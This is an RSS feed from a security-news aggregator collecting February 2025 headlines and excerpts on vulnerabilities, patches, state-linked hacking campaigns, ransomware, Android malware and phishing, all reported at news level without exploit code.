www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2025-05-12T09:14:28+00:00 www.secnews.physaphae.fr Cyble - CyberSecurity Firm FBI, CISA Urge Memory-Safe Practices for Software Development Software Development  In a strongly worded advisory, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have urged software developers to cease unsafe development practices that lead to “unforgivable” buffer overflow vulnerabilities.  “Despite the existence of well-documented, effective mitigations for buffer overflow vulnerabilities, many manufacturers continue to use unsafe software development practices that allow these vulnerabilities to persist,” the agencies said in the February 12 Secure By Design alert. “For these reasons, as well as the damage exploitation of these defects can cause, CISA, FBI, and others designate buffer overflow vulnerabilities as unforgivable defects.”  The agencies said threat actors leverage buffer overflow vulnerabilities to gain initial access to networks, thus making them a critical point for preventing attacks.  We'll look at the prevalence of buffer overflow vulnerabilities, some examples cited by CISA and the FBI, and guidance for secure development and use of memory-safe programming languages.  Buffer Overflow Vulnerabilities: Prevalence and Examples  The FBI-CISA guidance specifically mentions the common software weaknesses CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), along with stack-based buffer overflows (CWE-121) and heap-based buffer overflows (CWE-122).  The phrase “buffer overflow” occurs in 67 of the 1270 vulnerabilities in CISA's Known Exploited Vulnerabilities (KEV) catalog, or 5.28% of the KEV database. The words “buffer” and “overflow” occur in 84 of the KEV vulnerabilities (6.6%).
CISA and the FBI cited six examples of buffer overflow vulnerabilities in IT products:  CVE-2025-21333, a Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege vulnerability  CVE-2025-0282, a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3  2025-02-14T10:11:29+00:00 https://cyble.com/blog/fbi-cisa-push-for-memory-safe-software-practices/ www.secnews.physaphae.fr/article.php?IdArticle=8648463 False Vulnerability,Threat None 4.0000000000000000 Bleeping Computer - American Magazine PostgreSQL flaw exploited as zero-day in BeyondTrust breach Rapid7's vulnerability research team says attackers exploited a PostgreSQL security flaw as a zero-day to breach the network of privileged access management company BeyondTrust in December. [...] 2025-02-14T09:15:47+00:00 https://www.bleepingcomputer.com/news/security/postgresql-flaw-exploited-as-zero-day-in-beyondtrust-breach/ www.secnews.physaphae.fr/article.php?IdArticle=8648500 False Vulnerability,Threat None 2.0000000000000000 InformationSecurityBuzzNews - Security News Site Espionage Tools Associated with China Used in Ransomware Attacks Espionage actors linked to China may be diversifying their operations, as new evidence points to the use of espionage tools in a recent ransomware attack against a South Asian software and services company.
Symantec Threat Intelligence reports that the attack, involving the RA World ransomware, stands out due to the distinct toolset typically associated with [...] 2025-02-14T07:23:48+00:00 https://informationsecuritybuzz.com/espionage-tools-used-in-ransomware-att/ www.secnews.physaphae.fr/article.php?IdArticle=8648453 False Ransomware,Tool,Threat None 3.0000000000000000 Volexity - Cyber Firms Multiple Russian Threat Actors Targeting Microsoft Device Code Authentication KEY TAKEAWAYS Volexity has observed multiple Russian threat actors conducting social-engineering and spear-phishing campaigns targeting organizations with the ultimate goal of compromising Microsoft 365 accounts via Device Code Authentication phishing. Device Code Authentication phishing follows a workflow atypical of what users expect, meaning users may not recognize it as phishing. Recent campaigns observed have been politically themed, particularly around the new administration in the United States and the changes this might mean for nations around the world. Starting in mid-January 2025, Volexity identified several social-engineering and spear-phishing campaigns by Russian threat actors aimed at compromising Microsoft 365 (M365) accounts. These attack campaigns were highly targeted and carried out in a variety of ways. The majority of these attacks originated via spear-phishing emails with different themes. In one case, the eventual breach began with highly tailored outreach via Signal. Through its investigations, Volexity discovered that Russian threat actors were impersonating […]
2025-02-13T22:32:30+00:00 https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ www.secnews.physaphae.fr/article.php?IdArticle=8648428 False Threat None 3.0000000000000000
Dark Reading - Informationweek Branch Chinese APT 'Emperor Dragonfly' Moonlights With Ransomware Pivoting from prior cyber espionage, the threat group deployed its backdoor tool set to ultimately push out RA World malware, demanding $2 million from its victim. 2025-02-13T21:32:35+00:00 https://www.darkreading.com/cyberattacks-data-breaches/chinese-apt-emperor-dragonfly-ransomware-attack www.secnews.physaphae.fr/article.php?IdArticle=8648423 False Ransomware,Malware,Tool,Threat None 3.0000000000000000 HackRead - Cyber Search Microsoft Uncovers 'BadPilot' Campaign as Seashell Blizzard Targets US and UK Russian GRU-linked hackers exploit known software flaws to breach critical networks worldwide, targeting the United States and the… 2025-02-13T21:27:54+00:00 https://hackread.com/microsoft-badpilot-campaign-seashell-blizzard-usa-uk/ www.secnews.physaphae.fr/article.php?IdArticle=8648424 False Threat APT 44 3.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors.
The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet 2025-02-13T19:56:00+00:00 https://thehackernews.com/2025/02/north-korean-apt43-uses-powershell-and.html www.secnews.physaphae.fr/article.php?IdArticle=8648389 False Threat APT 43 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Salt Typhoon remains active, hits more telecom networks via Cisco routers The Chinese nation-state threat group intruded five additional telecom networks between December and January, including two unnamed providers in the U.S., Recorded Future researchers said.
2025-02-13T19:10:35+00:00 https://cyberscoop.com/salt-typhoon-china-ongoing-telecom-attack-spree/ www.secnews.physaphae.fr/article.php?IdArticle=8648413 False Threat None 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) RA World Ransomware Attack in South Asia Links to Chinese Espionage Toolset An RA World ransomware attack in November 2024 targeting an unnamed Asian software and services company involved the use of a malicious tool exclusively used by China-based cyber espionage groups, raising the possibility that the threat actor may be moonlighting as a ransomware player in an individual capacity. "During the attack in late 2024, the attacker deployed a distinct toolset that had 2025-02-13T17:28:00+00:00 https://thehackernews.com/2025/02/hackers-exploited-pan-os-flaw-to-deploy.html www.secnews.physaphae.fr/article.php?IdArticle=8648368 False Ransomware,Tool,Threat None 3.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Palo Alto Networks Patches Authentication Bypass Exploit in PAN-OS Software Palo Alto Networks has addressed a high-severity security flaw in its PAN-OS software that could result in an authentication bypass. The vulnerability, tracked as CVE-2025-0108, carries a CVSS score of 7.8 out of 10.0. The score, however, drops to 5.1 if access to the management interface is restricted to a jump box. "An authentication bypass in the Palo Alto Networks PAN-OS software enables an 2025-02-13T15:09:00+00:00 https://thehackernews.com/2025/02/palo-alto-networks-patches.html www.secnews.physaphae.fr/article.php?IdArticle=8648339 False Vulnerability,Threat None 3.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts.
The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university, 2025-02-13T14:41:00+00:00 https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html www.secnews.physaphae.fr/article.php?IdArticle=8648331 False Malware,Threat None 3.0000000000000000 Checkpoint - Security Hardware Manufacturer January 2025's Most Wanted Malware: FakeUpdates Continues to Dominate Check Point Software's latest threat index highlights that FakeUpdates continues to pose a significant threat in the cyber landscape, playing a crucial role in facilitating ransomware attacks. A recent investigation by security researchers revealed that an affiliate of RansomHub utilized a Python-based backdoor to maintain persistent access and deploy ransomware across various networks. Installed shortly after FakeUpdates gained initial access, this backdoor demonstrated advanced obfuscation techniques along with AI-assisted coding patterns. The attack involved lateral movement through remote desktop protocol (RDP) and established ongoing access by creating scheduled tasks. The advanced techniques highlight an increasing reality: cyber criminals are evolving […]
2025-02-13T13:00:34+00:00 https://blog.checkpoint.com/research/january-2025s-most-wanted-malware-fakeupdates-continues-to-dominate-2/ www.secnews.physaphae.fr/article.php?IdArticle=8648365 False Ransomware,Malware,Threat None 2.0000000000000000
DarkTrace - DarkTrace: AI-based detection Why Darktrace / EMAIL excels against APTs APTs are sophisticated threat actors with the resources to coordinate and achieve long-term objectives. Amidst the skyrocketing numbers of BEC attacks, every organization should be worried about the ability of intruders to infiltrate and exploit. This blog will look at several recent examples of complex email attacks and how Darktrace / EMAIL successfully disarmed and prevented intrusion. 2025-02-13T13:00:01+00:00 https://darktrace.com/blog/why-darktrace-email-excels-against-apts www.secnews.physaphae.fr/article.php?IdArticle=8648358 False Threat None 3.0000000000000000 Cyble - CyberSecurity Firm CISA Updates Known Exploited Vulnerabilities Catalog with Four Critical Issues In a recent update to its Known Exploited Vulnerabilities Catalog, the Cybersecurity and Infrastructure Security Agency (CISA) has added four security vulnerabilities that are currently under active exploitation. These vulnerabilities span multiple platforms and pose substantial security risks for both organizations and individual users. The vulnerabilities identified as CVE-2024-40891, CVE-2024-40890, CVE-2025-21418, and CVE-2025-21391 can be exploited with relative ease if security updates are not applied promptly. Users and organizations should follow the guidance provided by vendors like Zyxel and Microsoft, ensuring that their systems are updated regularly to address the latest security flaws. For organizations relying on Zyxel DSL routers or Windows-based systems, it is crucial to assess the exposure to these vulnerabilities and take immediate steps to update firmware or software versions.
Details of the Vulnerabilities and Active Exploitation CVE-2024-40891 and CVE-2024-40890: Critical Command Injection Vulnerabilities in Zyxel DSL Routers The two vulnerabilities, CVE-2024-40891 and CVE-2024-40890, are related to a series of command injection vulnerabilities affecting Zyxel DSL CPE devices. Specifically, these vulnerabilities affect the Zyxel VMG4325-B10A router model running firmware version 1.00(AAFR.4)C0_20170615. Both vulnerabilities share a common thread: they allow authenticated attackers to execute arbitrary operating system (OS) commands on the affected devices via Telnet (CVE-2024-40891) or a crafted HTTP POST request (CVE-2024-40890). This puts devices at high risk of being compromised by threat actors who can exploit these weaknesses to gain control of the affected systems. According to the official Zyxel advisory, both vulnerabilities have been assigned a CVSS severity score of 8.8 (High). These flaws stem from improper neutralization of special elements used in OS commands (CWE-78: Improper Neutralization of Special Elements used in an OS Command). Once successfully exploited, the vulnerabilities could allow attackers to bypass authentication and execute malicious OS commands, effectively compromising the security of the devices. Zyxel has issued advisories urging users to update their firmware to mitigate these vulnerabilities. Devices using older firmware versions are especially at risk.
The active exploitation of these vulnerabilities could lead to severe consequences, such as unauthorized access, 2025-02-13T11:40:21+00:00 https://cyble.com/blog/cisa-adds-4-critical-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8648344 False Vulnerability,Threat None 3.0000000000000000 Cyble - CyberSecurity Firm Cyble Warns of Exposed Medical Imaging, Asset Management Systems Overview Cyble's weekly industrial control system (ICS) vulnerability report to clients warned about internet-facing medical imaging and critical infrastructure asset management systems that could be vulnerable to cyberattacks. The report examined six ICS, operational technology (OT), and Supervisory Control and Data Acquisition (SCADA) vulnerabilities in total, but it focused on two in particular after Cyble detected web-exposed instances of the systems. Orthanc, Trimble Cityworks Vulnerabilities Highlighted by CISA The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued advisories alerting users to vulnerabilities in medical imaging and asset management products. Orthanc is an open-source DICOM server used in healthcare environments for medical imaging storage and retrieval, while Trimble Cityworks is a GIS-centric asset management system used to manage all infrastructure assets for airports, utilities, municipalities, and counties. In a February 6 ICS medical advisory, CISA said the Orthanc server prior to version 1.5.8 does not enable basic authentication by default when remote access is enabled, which could result in unauthorized access by a malicious actor. The Missing Authentication for Critical Function vulnerability, CVE-2025-0896, has been assigned a CVSS v3.1 base score of 9.8, just below the maximum score of 10.0.
Orthanc recommends that users update to the latest version or enable HTTP authentication by setting the configuration "AuthenticationEnabled": true in the configuration file. Cyble provided a publicly accessible search query for its ODIN vulnerability search tool, which users can use to find potentially vulnerable instances. “This flaw requires urgent attention, as Cyble researchers have identified multiple internet-facing Orthanc instances, increasing the risk of exploitation,” the Cyble report said. “The exposure of vulnerable instances could allow unauthorized access to sensitive medical data, manipulation of imaging records, or even unauthorized control over the server. Given the high stakes in healthcare cybersecurity, immediate patching to version 1.5.8 or later, along with restricting external access, is strongly recommended to mitigate potential threats.” 2025-02-13T11:15:54+00:00 https://cyble.com/blog/cyble-warns-of-exposed-medical-imaging-systems/ www.secnews.physaphae.fr/article.php?IdArticle=8648345 True Tool,Vulnerability,Threat,Patching,Industrial,Medical None 3.0000000000000000 Global Security Mag - French news site Cybersecurity: Mimecast Threat Intelligence Report, second half of 2024 Investigations
Cybersecurity: Mimecast Threat Intelligence Report, second half of 2024 The study draws on more than 90 billion data points analyzed across Mimecast's 42,000 customers in the second half of 2024. • More than 5 billion threats were reported between July and December 2024. • The entertainment and information sectors were the most targeted by attacks, with more than 10 threats per user. • Cybercriminals use a variety of techniques to carry out their attacks. In this context, phishing attacks are on the rise. • AI remains both an asset and a threat to cybersecurity. - Investigations
2025-02-13T09:40:57+00:00 https://www.globalsecuritymag.fr/cybersecurite-rapport-threat-intelligence-mimecast-2e-semestre-2024.html www.secnews.physaphae.fr/article.php?IdArticle=8648333 False Threat,Studies None 4.0000000000000000
Bleeping Computer - American Magazine Chinese espionage tools deployed in RA World ransomware attack A China-based threat actor, tracked as Emperor Dragonfly and commonly associated with cybercriminal endeavors, has been observed using, in a ransomware attack, a toolset previously attributed to espionage actors. [...] 2025-02-13T09:31:54+00:00 https://www.bleepingcomputer.com/news/security/chinese-espionage-tools-deployed-in-ra-world-ransomware-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8648386 False Ransomware,Tool,Threat None 2.0000000000000000 AlienVault Lab Blog - AlienVault is a major defense player in IOCs Best Practices for Securing Web Applications Against Modern Threats Enterprise Strategy Group, organizations are anticipating an explosion in web applications, web sites, and associated APIs in the next two years. Research respondents reported they support an average of 145 applications today and are expecting that number to grow to 201 within 24 months. Additionally, the same research shows that organizations with at least half of their applications using APIs will grow from 32% today to 80% within 24 months. This explosive growth is creating a viable attack vector for cybercriminals and more challenges for security teams. Nearly half (46%) of respondents in the ESG research survey said that web application and API protection is more difficult than it was two years ago, citing environmental changes as one of the main challenges. This includes maintaining visibility and security of APIs, using cloud infrastructure, and securing cloud-native architectures. Organizations are increasingly facing diverse attacks as cybercriminals employ various techniques to gain unauthorized access to API endpoints and expose or steal sensitive information.
According to ESG’s recent report findings, the top threat vector being exploited is application and API attacks through lesser-known vulnerabilities, with 41% of organizations reporting such attacks. Adopting Best Practices for API Security To mitigate the complexities and challenges of today's environment, more organizations recognize the importance of API security and are adopting best practices, including seeking assistance from third-party providers. In fact, according to ESG, 45% of organizations plan to work with managed service providers to manage web application and API protection tools. Application and API protection are quickly becoming a fundamental security control, because when left unprotected, APIs provide an easy way to gain unauthorized access to IT networks and disrupt business, steal data, or launch cyberattacks. By adopting security best practices, organizations can mitigate vulnerabilities and other exposures that attackers could potentially exploit and protect APIs from security threats like unauthorized access and data breaches. Identifying Common Risks and Threats To effectively safeguard your APIs, it is crucial to understand the common risks and threats that exist, including: injection attacks, vulnerability exploits, authentication issues, broken access controls, distributed denial of service (DDoS), brute-force attacks, API abuse, machine-in-the-middle (MITM) attacks, and cross-site scripting (XSS). Use Proactive Defense with Best Practices to Protect Your APIs from Threats Organizations and security teams should understand and implement API security best practices to prevent APIs from being attacked or abused. Secure development Build API security standards and practices into every stage of API development to find vulnerabilities before APIs enter production. Incorporate automated security testing throughout the entire process and run a wide range of tests simulating malicious traffic.
Implement strict input validation and sanitization to prevent injection attack 2025-02-13T06:03:00+00:00 https://levelblue.com/blogs/security-essentials/best-practices-securing-web-applications www.secnews.physaphae.fr/article.php?IdArticle=8648384 False Tool,Vulnerability,Threat,Cloud None 2.0000000000000000 InformationSecurityBuzzNews - Security News Site Russia-Linked Seashell Blizzard Intensifies Cyber Operations Against Critical Sectors The Russia-linked threat actor known as Seashell Blizzard has assigned one of its subgroups to gain initial access to internet-facing infrastructure and establish long-term persistence within targeted entities, a Microsoft report has revealed.  Also dubbed APT44, BlackEnergy Lite, Sandworm, Telebots, and Voodoo Bear, Seashell Blizzard has been active since at least 2009 and is believed [...] 2025-02-13T06:02:16+00:00 https://informationsecuritybuzz.com/russia-linked-seashell-blizzard-intens/ www.secnews.physaphae.fr/article.php?IdArticle=8648314 False Threat APT 44 3.0000000000000000 Cyber Skills - Cyber Podcast Beware of Romance Scams this Valentine's Day As Valentine's Day approaches, many people are looking to connect with others online. While online dating can be a great way to meet new people, it is also important to be aware of the potential dangers. Romance scams, where fraudsters use fake profiles to financially and emotionally exploit victims, are becoming more common. These scammers manipulate their victims into sending money under false pretenses. They often succeed by building trusting relationships over long periods of time.   Warning signs of Romance Scams Scammers typically gain trust by showering their target with attention and compliments before eventually asking them for money. They may claim it's for travel expenses, medical emergencies (typically of a child), or a business opportunity that would help to bring the relationship closer.
Common red flags can include rushing the relationship, avoiding personal questions and refusing to meet in person. They may also try to move conversation off dating platforms to a less secure platform to avoid being detected as a scam. If someone you have met online asks for financial help, it's a major warning sign.   How to protect yourself Use trusted dating websites with strong security measures. Keep personal details private and be cautious when sharing information. Never send money or provide financial assistance to someone that you haven't met in person. Be careful with your webcams, as scammers often try to exploit video recordings as ransom. Trust your instincts - if something feels off, it probably is.   At CyberSkills, we're committed to helping people stay safe online. This Valentine's Day, protect both your heart and your security and stay safe!   An Garda Síochána. (2025). Beware of Romance Scams. Retrieved from https://www.garda.ie/en/crime/fraud/am-i-a-victim-of-a-romance-scam-.html 2025-02-13T00:00:00+00:00 https://www.cyberskills.ie/explore/news/beware-of-romance-scams-this-valentines-day.html www.secnews.physaphae.fr/article.php?IdArticle=8648356 False Threat,Medical None 3.0000000000000000 Recorded Future - Recorded Future Feed Cybercrime evolving into national security threat: Google “The vast cybercriminal ecosystem has acted as an accelerant for state-sponsored hacking, providing malware, vulnerabilities, and in some cases full-spectrum operations to states,” said Ben Read of Google Threat Intelligence Group. 2025-02-12T22:06:18+00:00 https://therecord.media/cybercrime-evolving-nation-state-threat www.secnews.physaphae.fr/article.php?IdArticle=8648284 False Malware,Vulnerability,Threat None 3.0000000000000000 Techworm - News Microsoft Patches 63 Flaws, Including Two Actively Exploited Zero-Days CVE-2025-21391 (CVSS 7.1) – Windows Storage Elevation of Privilege Vulnerability This Elevation of Privilege (EoP) vulnerability in Windows
Storage allows a local, authenticated attacker to delete targeted files on a system. “An attacker would only be able to delete targeted files on a system. This vulnerability does not allow disclosure of any confidential information, but could allow an attacker to delete data that could include data that results in the service being unavailable,” reads Microsoft's advisory. No details about how this flaw was exploited in attacks or who reported it have been revealed. CVE-2025-21418 (CVSS 7.8) – Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability The second actively exploited vulnerability allows an attacker to run a crafted program to gain SYSTEM privileges in Windows. It remains unclear how this flaw was exploited in attacks, and Microsoft states that it was disclosed anonymously. Additionally, the other two publicly disclosed zero-days that were patched in the February 2025 Patch Tuesday update are: CVE-2025-21194 (CVSS 7.1) – Microsoft Surface Security Feature Bypass Vulnerability According to Microsoft, this hypervisor flaw allows attackers to bypass UEFI and compromise the secure kernel on Surface devices. It is likely linked to the PixieFail vulnerabilities. “This Hypervisor vulnerability relates to Virtual Machines within a Unified Extensible Firmware Interface (UEFI) host machine. On some specific hardware it might be possible to bypass the UEFI, which could lead to the compromise of the hypervisor and the secure kernel,” explains Microsoft’s advisory. The tech giant credited Francisco Falcón and Iván Arce of Quarkslab for discovering and reporting the vulnerability. CVE-2025-21377 (CVSS 6.5) – NTLM Hash Disclosure Spoofing Vulnerability This flaw exposes a Windows user’s NTLM hashes, which allows a remote attacker to steal Windows user hashes via minimal file interaction and potentially log in as the user.
“Minimal interaction with a malicious file by a user such as selecting (single-click), inspecting (right-click), or performing an action other than opening or executing the file could trigger this vulnerability,” explains Microsoft’s advisory. 2025-02-12T20:18:47+00:00 https://www.techworm.net/2025/02/microsoft-patch-flaws-actively-exploited-zero-days.html www.secnews.physaphae.fr/article.php?IdArticle=8648206 False Vulnerability,Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Researchers Find New Exploit Bypassing Patched NVIDIA Container Toolkit Vulnerability Cybersecurity researchers have discovered a bypass for a now-patched security vulnerability in the NVIDIA Container Toolkit that could be exploited to break out of a container's isolation protections and gain complete access to the underlying host. The new vulnerability is being tracked as CVE-2025-23359 (CVSS score: 8.3). It affects the following versions - NVIDIA Container Toolkit (All 2025-02-12T19:34:00+00:00 https://thehackernews.com/2025/02/researchers-find-new-exploit-bypassing.html www.secnews.physaphae.fr/article.php?IdArticle=8648210 False Vulnerability,Threat None 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial Food and Ag-ISAC cyber threat report provides actionable intelligence on cyber threats, ransomware tactics The Food and Ag-ISAC released its latest publication, the Food and Ag Sector Cyber Threat Report, that employs...
2025-02-12T18:15:38+00:00 https://industrialcyber.co/reports/food-and-ag-isac-cyber-threat-report-provides-actionable-intelligence-on-cyber-threats-ransomware-tactics/ www.secnews.physaphae.fr/article.php?IdArticle=8648252 False Ransomware,Threat None 3.0000000000000000 Bleeping Computer - American Magazine zkLend loses $9.5M in crypto heist, asks hacker to return 90% Decentralized money lender zkLend suffered a breach where threat actors exploited a smart contract flaw to steal 3,600 Ethereum, worth $9.5 million at the time. [...] 2025-02-12T18:08:09+00:00 https://www.bleepingcomputer.com/news/cryptocurrency/zklend-loses-95m-in-crypto-heist-asks-hacker-to-return-90-percent/ www.secnews.physaphae.fr/article.php?IdArticle=8648291 False Threat None 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Russian state threat group shifts focus to US, UK targets A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said.
>A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said. ]]>
2025-02-12T17:58:47+00:00 https://cyberscoop.com/russian-state-threat-group-shifts-focus/ www.secnews.physaphae.fr/article.php?IdArticle=8648237 False Vulnerability,Threat APT 44 3.0000000000000000
Global Security Mag - French news site
Over two-thirds of cybersecurity breaches linked to human error, finds new Mimecast Threat Intelligence Report - Special Reports
2025-02-12T17:18:11+00:00 https://www.globalsecuritymag.fr/over-two-thirds-of-cybersecurity-breaches-linked-to-human-error-finds-new.html www.secnews.physaphae.fr/article.php?IdArticle=8648244 False Threat None 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?)
North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack
The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. "To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a
2025-02-12T16:13:00+00:00 https://thehackernews.com/2025/02/north-korean-hackers-exploit-powershell.html www.secnews.physaphae.fr/article.php?IdArticle=8648188 False Threat None 3.0000000000000000

Netskope - Netskope is an American software company providing an IT security platform
New Phishing Campaign Abuses Webflow, SEO, and Fake CAPTCHAs
Summary: Netskope Threat Labs is tracking a widespread phishing campaign affecting hundreds of Netskope customers and thousands of users. The campaign aims to steal credit card information to commit financial fraud, and has been ongoing since the second half of 2024. The attacker targets victims searching for documents on search engines, resulting in access to […]
2025-02-12T15:00:00+00:00 https://www.netskope.com/blog/new-phishing-campaign-abuses-webflow-seo-and-fake-captchas www.secnews.physaphae.fr/article.php?IdArticle=8648207 False Threat None 3.0000000000000000
HackRead - Cyber research
Apple Confirms 'Extremely Sophisticated' Exploit Threatening iOS Security
Apple fixes the USB Restricted Mode flaw in iOS 18.3.1 and iPadOS 18.3.1. Vulnerability exploited in targeted attacks.…
2025-02-12T13:45:35+00:00 https://hackread.com/apple-extremely-sophisticated-exploit-ios-security/ www.secnews.physaphae.fr/article.php?IdArticle=8648202 False Vulnerability,Threat None 3.0000000000000000

Cyble - CyberSecurity Firm
New Zealand's National Cyber Security Centre (NCSC) Reports Surge in Cyber Threats and Vulnerabilities
Overview: The 2023/24 Cyber Threat Report from New Zealand's National Cyber Security Centre (NCSC), led by Lisa Fong, Deputy Director-General for Cyber Security at the Government Communications Security Bureau (GCSB), sheds light on the country's rapidly changing cyber threat landscape. The report highlights an increase in cyber incidents targeting individuals, businesses, and critical national sectors, underlining the growing complexity of cyber threats. For the year ending June 2024, the NCSC recorded a total of 7,122 cybersecurity incidents, a new high since CERT NZ's integration into the NCSC. Of these incidents, 95% (6,799) were handled through the NCSC's general triage process. These incidents primarily affected small to medium businesses and individual users and resulted in a reported financial loss of $21.6 million. While these incidents did not require specialized technical interventions, they still had a substantial impact on those affected, particularly in terms of financial losses and reputational damage. A smaller subset of incidents, 343 in total, was categorized as having national significance. These incidents were more complex and targeted critical infrastructure or large organizations. Among them, 110 were linked to state-sponsored actors, signaling a slight increase in cyber activities from such groups. Financially motivated cybercriminal activities were responsible for 65 of these high-impact incidents, emphasizing the persistent threat from financially driven attacks such as ransomware and data exfiltration. 2023/24 Cyber Threat Report: State-Sponsored Cyber Threats and Ransomware
2025-02-12T10:33:38+00:00 https://cyble.com/blog/ncsc-reports-surge-in-cyber-threats-and-vulnerabilities/ www.secnews.physaphae.fr/article.php?IdArticle=8648178 False Ransomware,Tool,Vulnerability,Threat,Technical None 3.0000000000000000

Cyble - CyberSecurity Firm
BTMOB RAT: Newly Discovered Android Malware Spreading via Phishing Sites
Key Takeaways:
- BTMOB RAT is an advanced Android malware evolved from SpySolr that features remote control, credential theft, and data exfiltration.
- It spreads via phishing sites impersonating streaming services like iNat TV and fake mining platforms.
- The malware abuses Android's Accessibility Service to unlock devices, log keystrokes, and automate credential theft through injections.
- It uses WebSocket-based C&C communication for real-time command execution and data theft.
- BTMOB RAT supports various malicious actions, including live screen sharing, file management, audio recording, and web injections.
- The Threat Actor (TA) actively markets the malware on Telegram, offering paid licenses and continuous updates, making it an evolving and persistent threat.
Overview: On January 31, 2025, Cyble Research and Intelligence Labs (CRIL) identified a sample lnat-tv-pro.apk (13341c5171c34d846f6d0859e8c45d8a898eb332da41ab62bcae7519368d2248) being distributed via a phishing site "hxxps://tvipguncelpro[.]com/" impersonating iNat TV, an online streaming platform from Turkey, posing a serious threat to unsuspecting users.
Figure 1 – Phishing site distributing this malicious APK file
2025-02-12T10:31:36+00:00 https://cyble.com/blog/btmob-rat-newly-discovered-android-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8648179 False Malware,Tool,Threat,Mobile None 3.0000000000000000

Global Security Mag - French news site
DeepTempo announced that it has completed the BNY Ascent Program - Business News
DeepTempo Completes BNY Ascent Program to Advance AI-Driven Cybersecurity Innovation. Company collaborates with BNY on deep-learning solution for advanced threat protection - Business News
2025-02-12T08:36:11+00:00 https://www.globalsecuritymag.fr/deeptempo-announced-that-it-has-completed-the-bny-ascent-program.html www.secnews.physaphae.fr/article.php?IdArticle=8648169 False Threat None 3.0000000000000000
Krebs on Security - American researcher
Microsoft Patch Tuesday, February 2025 Edition
Microsoft today issued security updates to fix at least 56 vulnerabilities in its Windows operating systems and supported software, including two zero-day flaws that are being actively exploited.
2025-02-12T04:58:37+00:00 https://krebsonsecurity.com/2025/02/microsoft-patch-tuesday-february-2025-edition/ www.secnews.physaphae.fr/article.php?IdArticle=8648151 False Vulnerability,Threat None 2.0000000000000000

CyberScoop - scoopnewsgroup.com special Cyber
U.S. adversaries increasingly turning to cybercriminals and their malware for help
A Google Threat Intelligence Group report notes that Russia in particular has been doing this since the Ukraine war began.
2025-02-12T00:01:00+00:00 https://cyberscoop.com/u-s-adversaries-increasingly-turning-to-cybercriminals-and-their-malware-for-help/ www.secnews.physaphae.fr/article.php?IdArticle=8648140 False Malware,Threat None 3.0000000000000000
Dark Reading - Informationweek Branch
Apple Releases Urgent Patch for USB Vulnerability
The vulnerability could allow a threat actor to disable the security feature on a locked device and gain access to user data.
2025-02-11T21:41:57+00:00 https://www.darkreading.com/endpoint-security/apple-releases-urgent-patch-usb-vulnerability www.secnews.physaphae.fr/article.php?IdArticle=8648125 False Vulnerability,Threat None 3.0000000000000000

Techworm - News
Apple Patches Critical iOS Zero-Day CVE-2025-24200
On Monday, Apple rolled out emergency security updates to fix a critical zero-day vulnerability in iOS and iPadOS that was actively exploited
(1), (2) published on Monday. The Cupertino giant has credited security researcher Bill Marczak of The Citizen Lab at The University of Toronto's Munk School for discovering and reporting the vulnerability to Apple. The CVE-2025-24200 vulnerability affected a broad range of Apple devices, including:
- iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
- iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation
Apple has resolved the vulnerability by releasing software updates - iOS 18.3.1, iPadOS 18.3.1, and iPadOS 17.7.5 - with improved memory management. While Apple has not provided any information on how the vulnerability was exploited, it has strongly urged its iOS and iPadOS users to immediately update their devices to the latest versions to mitigate potential security threats. Further, enable automatic updates to ensure you receive future patches on your devices without delay. Avoid clicking on suspicious links and only download apps from trusted sources to reduce the risk of vulnerabilities. For software updates on iPhone or iPad, go to Settings > General > Software Update > Check for the update and install.
2025-02-11T20:40:58+00:00 https://www.techworm.net/2025/02/apple-patch-critical-ios-zero-day-cve-2025-24200.html www.secnews.physaphae.fr/article.php?IdArticle=8648064 False Tool,Vulnerability,Threat,Mobile None 3.0000000000000000
DarkTrace - DarkTrace: AI-based detection
